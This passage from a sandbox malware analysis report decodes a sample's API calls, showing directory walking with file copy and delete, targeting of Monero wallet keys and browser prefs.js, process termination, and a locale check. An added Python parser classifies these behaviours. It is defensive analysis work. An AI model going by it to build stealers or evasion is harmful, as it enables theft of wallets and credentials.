                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: b35ff102e66f5b428cf71ca0cb4fdc1fddddddbede8996ad1bc92ec1272e6006
                                  • Instruction ID: e2124e6b79c661193b5a4460fa08ab474da88afbd20db963cf0bda2d97e761b9
                                  • Opcode Fuzzy Hash: b35ff102e66f5b428cf71ca0cb4fdc1fddddddbede8996ad1bc92ec1272e6006
                                  • Instruction Fuzzy Hash: 08B16471A15118EBCB24EF64DC5AEED7379AF54300F0086A8E40A561D1EF386B88CF91
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0072523C,?,?,?,007252E4,?,?,00000000,?,00000000), ref: 00701963
                                  • StrCmpCA.SHLWAPI(?,0072538C), ref: 007019B3
                                  • StrCmpCA.SHLWAPI(?,00725434), ref: 007019C9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00701D80
                                  • DeleteFileA.KERNEL32(00000000), ref: 00701E0A
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00701E60
                                  • FindClose.KERNEL32(000000FF), ref: 00701E72
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 59c17615ab8ef3d109db598d939b7536ff1bf27dfe6f511b07cf2015c3768bdd
                                  • Instruction ID: f626a0b8b606d054846b27970a96733a52d33e03873368552d5c28367ab57c51
                                  • Opcode Fuzzy Hash: 59c17615ab8ef3d109db598d939b7536ff1bf27dfe6f511b07cf2015c3768bdd
                                  • Instruction Fuzzy Hash: 191212B1A15118EBCB25FB64DC6AAEE7379AF54310F4045D9B106620D1EF386BC8CFA1
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00720C32), ref: 0070DF5E
                                  • StrCmpCA.SHLWAPI(?,007215C0), ref: 0070DFAE
                                  • StrCmpCA.SHLWAPI(?,007215C4), ref: 0070DFC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070E4E0
                                  • FindClose.KERNEL32(000000FF), ref: 0070E4F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: bc1d39af801164ae8128bf975736eb913f1c39b35102e77f24a80079292777b8
                                  • Instruction ID: 39fe92a08dbdd15dd59623adce130ae63184124f2a86786e532150dc5fe258fd
                                  • Opcode Fuzzy Hash: bc1d39af801164ae8128bf975736eb913f1c39b35102e77f24a80079292777b8
                                  • Instruction Fuzzy Hash: 8CF1DEB1925158EACB25EB64DCA9EEE7379BF14310F4045D9B00A620D1EF386BC8CF65
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007215A8,00720BAF), ref: 0070DBEB
                                  • StrCmpCA.SHLWAPI(?,007215AC), ref: 0070DC33
                                  • StrCmpCA.SHLWAPI(?,007215B0), ref: 0070DC49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070DECC
                                  • FindClose.KERNEL32(000000FF), ref: 0070DEDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 94183d014bfc000714f0c8b3da5222236316328fb0b9d86b75d53dd12728f4de
                                  • Instruction ID: 0b94a41b4fb037cb1d83822d15dd2ccd87a958141db303f370b1734b4e05e7b5
                                  • Opcode Fuzzy Hash: 94183d014bfc000714f0c8b3da5222236316328fb0b9d86b75d53dd12728f4de
                                  • Instruction Fuzzy Hash: EA916872A04204EBCB14FBB4ED5A9ED737DAF94300F008659F906561C1EE389B98CB92
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00719905
                                  • Process32First.KERNEL32(00709FDE,00000128), ref: 00719919
                                  • Process32Next.KERNEL32(00709FDE,00000128), ref: 0071992E
                                  • StrCmpCA.SHLWAPI(?,00709FDE), ref: 00719943
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0071995C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0071997A
                                  • CloseHandle.KERNEL32(00000000), ref: 00719987
                                  • CloseHandle.KERNEL32(00709FDE), ref: 00719993
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: ca6463002e4eaf627c1f9d23d8df9f44f2a3163e4de14ecf3d772dc22244be4a
                                  • Instruction ID: 66a49a5682564e47b7c2158adb7c491cdca133fa76ba95787c5895416485e8fb
                                  • Opcode Fuzzy Hash: ca6463002e4eaf627c1f9d23d8df9f44f2a3163e4de14ecf3d772dc22244be4a
                                  • Instruction Fuzzy Hash: 93111F75959218ABCB24DFE4DC49BDDF778AB88700F00458DF605A6280E774AAC4DF90
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,007205B7), ref: 00717D71
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00717D89
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00717D9D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00717DF2
                                  • LocalFree.KERNEL32(00000000), ref: 00717EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: d0c187a96328cf856ff4ff7d1d71dccb3ef514f9994ceb1e0a323f59bacfc97c
                                  • Instruction ID: 9fe715e45ba28ab2ccb77c42c73020b769204a372a453e469a93b3b349d90c9e
                                  • Opcode Fuzzy Hash: d0c187a96328cf856ff4ff7d1d71dccb3ef514f9994ceb1e0a323f59bacfc97c
                                  • Instruction Fuzzy Hash: 74413BB1955218EBCB24DB98DC99BEEB374EB44700F1041D9E10A62191DB386FC8CFA1
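Three of the functions above are readable as behaviour from their API lists alone, once the hex immediates are decoded with the standard Win32 values: the walker at ref 00701963 enumerates a directory with FindFirstFileA/FindNextFileA and then calls CopyFileA (third argument 00000001, bFailIfExists=TRUE) and DeleteFileA on each entry; the loop at ref 00719905 takes CreateToolhelp32Snapshot(00000002 = TH32CS_SNAPPROCESS), walks it with Process32First/Process32Next (dwSize 00000128 = 296, sizeof(PROCESSENTRY32) for a 32-bit ANSI build), compares each image name with StrCmpCA and opens matches with OpenProcess(00000001 = PROCESS_TERMINATE) before TerminateProcess; and the function at ref 00717D71 lists keyboard layouts with GetKeyboardLayoutList and resolves each through GetLocaleInfoA with LCType 00000002 = LOCALE_SLANGUAGE, which is the locale check the signature list flags as a possible evasion. The parser below is an added example, not part of the report or of Joe Sandbox: it reads call lines in the report's own format, matches a few behaviour rules and decodes those constants. The rule names and the constant table are my own choices; the sample input is copied from the three blocks above.

```python
"""Turn the per-function API lists of a Joe Sandbox report into behaviour verdicts.

Added example, not part of the report, of Joe Sandbox, or of the analysed sample.
"""
import re
from typing import Dict, List, NamedTuple, Optional, Set, Tuple

# One call line as the report prints it, with or without the subcall prefix:
#   "• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0071995C"
#   "  • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98"
CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]{8})"
)


class Call(NamedTuple):
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # helper address when the report marks the call as a subcall


def parse_calls(block: str) -> List[Call]:
    """Parse one function's 'APIs' block; lines that are not calls are skipped."""
    calls = []
    for line in block.splitlines():
        m = CALL_RE.search(line)
        if m:
            calls.append(Call(m["api"], m["mod"], m["args"].split(","), m["ref"], m["sub"]))
    return calls


# A rule fires when every API in the set is called directly by one function.
RULES: Dict[str, Set[str]] = {
    "dir_walk_copy_delete": {"FindFirstFileA", "FindNextFileA", "CopyFileA", "DeleteFileA"},
    "process_kill_loop": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next",
                          "OpenProcess", "TerminateProcess"},
    "keyboard_locale_check": {"GetKeyboardLayoutList", "GetLocaleInfoA"},
}

# Standard Win32 values for immediates the report prints in hex, keyed by (api, arg index).
CONSTANTS: Dict[Tuple[str, int], Dict[int, str]] = {
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS"},
    ("Process32First", 1): {0x128: "dwSize=sizeof(PROCESSENTRY32) (32-bit ANSI)"},
    ("OpenProcess", 0): {0x1: "PROCESS_TERMINATE"},
    ("GetLocaleInfoA", 1): {0x2: "LOCALE_SLANGUAGE"},
    ("CopyFileA", 2): {0x1: "bFailIfExists=TRUE"},
    ("LocalAlloc", 0): {0x40: "LPTR"},
}


def match_rules(calls: List[Call], include_subcalls: bool = False) -> List[str]:
    """Rules satisfied by the function. Subcall entries are shared helpers (in this
    report the lstrcpy/lstrcat path builders every file walker uses), so they are
    excluded by default to keep unrelated functions from matching alike."""
    names = {c.api for c in calls if include_subcalls or c.subcall is None}
    return sorted(rule for rule, need in RULES.items() if need <= names)


def decode_constants(calls: List[Call]) -> List[str]:
    """Names for the hex immediates the report shows; '?' (unresolved) is skipped."""
    out = []
    for c in calls:
        for (api, idx), table in CONSTANTS.items():
            if c.api != api or idx >= len(c.args):
                continue
            try:
                value = int(c.args[idx], 16)
            except ValueError:
                continue
            if value in table:
                out.append(f"{api} arg{idx}: {table[value]}")
    return out


# Sample input copied from the report's API blocks for refs 00719905, 00701963, 00717D71.
KILL_BLOCK = """
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00719905
• Process32First.KERNEL32(00709FDE,00000128), ref: 00719919
• Process32Next.KERNEL32(00709FDE,00000128), ref: 0071992E
• StrCmpCA.SHLWAPI(?,00709FDE), ref: 00719943
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0071995C
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0071997A
• CloseHandle.KERNEL32(00000000), ref: 00719987
• CloseHandle.KERNEL32(00709FDE), ref: 00719993
"""
COPY_BLOCK = """
  • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0072523C,?,?,?,007252E4,?,?,00000000,?,00000000), ref: 00701963
• StrCmpCA.SHLWAPI(?,0072538C), ref: 007019B3
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00701D80
• DeleteFileA.KERNEL32(00000000), ref: 00701E0A
• FindNextFileA.KERNEL32(000000FF,?), ref: 00701E60
• FindClose.KERNEL32(000000FF), ref: 00701E72
"""
LOCALE_BLOCK = """
• GetKeyboardLayoutList.USER32(00000000,00000000,007205B7), ref: 00717D71
• LocalAlloc.KERNEL32(00000040,?), ref: 00717D89
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00717DF2
• LocalFree.KERNEL32(00000000), ref: 00717EB2
"""

if __name__ == "__main__":
    for name, block in (("kill", KILL_BLOCK), ("copy", COPY_BLOCK), ("locale", LOCALE_BLOCK)):
        calls = parse_calls(block)
        print(name, match_rules(calls), decode_constants(calls))
```

The two StrCmpCA calls that follow each FindFirstFileA in the report compare the returned name against two adjacent 4-byte string constants (for example 0072538C and 00725434); the report does not print their contents, so the parser treats them as opaque rather than assuming they are the "." and ".." entries such loops normally skip.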
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0j?$5`=$>)lw$Fa{$^kl$e8r$hw
                                  • API String ID: 0-2916595342
                                  • Opcode ID: fbbb63ecdc622474d0e3e1807a6a93701378f02496cceb9bd5b2912199296c10
                                  • Instruction ID: 2f8b5764a924230a76374cad7979f10745cba6147e315b76b10ec3af4a93170b
                                  • Opcode Fuzzy Hash: fbbb63ecdc622474d0e3e1807a6a93701378f02496cceb9bd5b2912199296c10
                                  • Instruction Fuzzy Hash: A9B239F3A082049FE304AE2DEC8567AF7E9EF94720F1A453DEAC5C3744E93558058697
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00720D79), ref: 0070E5A2
                                  • StrCmpCA.SHLWAPI(?,007215F0), ref: 0070E5F2
                                  • StrCmpCA.SHLWAPI(?,007215F4), ref: 0070E608
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070ECDF
                                  Strings
                                  Memory Dump Source
                                   • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 28b6e0038b660f9a22eb1284924cc1d855d2be787cb115be7b09ddec966e4483
                                  • Instruction ID: 68e081fc0e6cef5b0b304a46ee33849c53bc855b5186f4ccc84c9f6364719ceb
                                  • Opcode Fuzzy Hash: 28b6e0038b660f9a22eb1284924cc1d855d2be787cb115be7b09ddec966e4483
